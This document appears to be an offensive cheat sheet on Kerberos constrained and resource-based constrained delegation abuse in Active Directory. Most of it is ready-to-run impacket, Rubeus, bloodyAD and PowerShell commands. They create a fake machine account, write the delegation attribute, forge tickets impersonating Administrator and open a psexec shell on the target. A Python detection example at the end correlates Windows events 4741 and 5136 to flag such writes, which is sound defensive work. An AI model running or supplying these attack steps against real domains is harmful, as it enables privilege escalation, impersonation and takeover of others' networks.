Kerberos delegation abuse — exploit constrained and resource-based constrained delegation (RBCD) to impersonate users.
Credentials
-
# Find delegation settings
impacket-findDelegation senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27

# --- Constrained Delegation ---
.\Rubeus.exe s4u /user:sec_user /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.senshu.local /ptt

# --- RBCD (need write access to msDS-AllowedToActOnBehalfOfOtherIdentity) ---
# RBCD - create machine account
impacket-addcomputer senshu.local/sec_user:'P@ssw0rd' -computer-name 'FAKE01$' -computer-pass 'FakePass123' -dc-ip 10.10.10.27

# RBCD — configure delegation from fake computer to target
impacket-rbcd senshu.local/sec_user:'P@ssw0rd' -delegate-from 'FAKE01$' -delegate-to 'TARGET$' -dc-ip 10.10.10.27 -action write
# or bloodyAD:
bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add rbcd 'TARGET$' 'FAKE01$'

# RBCD — request service ticket via S4U
impacket-getST senshu.local/'FAKE01$':'FakePass123' -spn cifs/TARGET.senshu.local -impersonate Administrator -dc-ip 10.10.10.27

# Use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec senshu.local/Administrator@TARGET.senshu.local -k -no-pass
Shell
-
# RBCD from Windows
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount FAKE01$
.\Rubeus.exe s4u /user:FAKE01$ /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.senshu.local /ptt
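Both RBCD paths above end in a write to msDS-AllowedToActOnBehalfOfOtherIdentity on the target, and the Linux path first creates a machine account. The following is an added detection example, not code from the original page or from the Impacket or Rubeus projects: it correlates Windows Security events 4741 (computer account created) and 5136 (directory object modified) per subject. It assumes the events are already parsed into dicts keyed by their EventData field names; the sample events, the function name and the 24-hour window are constructed for illustration.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"        # OperationType in event 5136: "Value Added"
WINDOW = timedelta(hours=24)   # assumed correlation window, tune per environment

# Constructed sample events (not real logs), reusing the names from the page.
SAMPLE_EVENTS = [
    {"EventID": 4741, "TimeCreated": "2024-05-01T10:00:00",
     "SubjectUserName": "sec_user", "TargetUserName": "FAKE01$"},
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:02:30",
     "SubjectUserName": "sec_user", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=TARGET,CN=Computers,DC=senshu,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"EventID": 5136, "TimeCreated": "2024-05-01T11:00:00",
     "SubjectUserName": "helpdesk", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=WS01,CN=Computers,DC=senshu,DC=local",
     "AttributeLDAPDisplayName": "description"},
    {"EventID": 5136, "TimeCreated": "2024-05-03T09:00:00",
     "SubjectUserName": "adm_ops", "OperationType": VALUE_ADDED,
     "ObjectDN": "CN=SQL01,CN=Computers,DC=senshu,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
]

def find_rbcd_writes(events, window=WINDOW):
    """One finding per RBCD attribute write; 'high' when the same subject
    created a machine account within `window` before the write."""
    created = {}   # subject (lowercased) -> [(time, new computer account)]
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        subject = ev["SubjectUserName"].lower()
        if ev["EventID"] == 4741:
            created.setdefault(subject, []).append((ts, ev["TargetUserName"]))
        elif (ev["EventID"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR.lower()
              and ev.get("OperationType") == VALUE_ADDED):
            recent = [name for t, name in created.get(subject, [])
                      if timedelta(0) <= ts - t <= window]
            findings.append({"time": ev["TimeCreated"],
                             "subject": ev["SubjectUserName"],
                             "target": ev["ObjectDN"],
                             "new_machine_accounts": recent,
                             "severity": "high" if recent else "review"})
    return findings

if __name__ == "__main__":
    for finding in find_rbcd_writes(SAMPLE_EVENTS):
        print(finding)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the modified object carries a SACL covering the write, so confirm both before relying on this correlation.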
https://github.com/fortra/impacket
https://github.com/GhostPack/Rubeus
https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html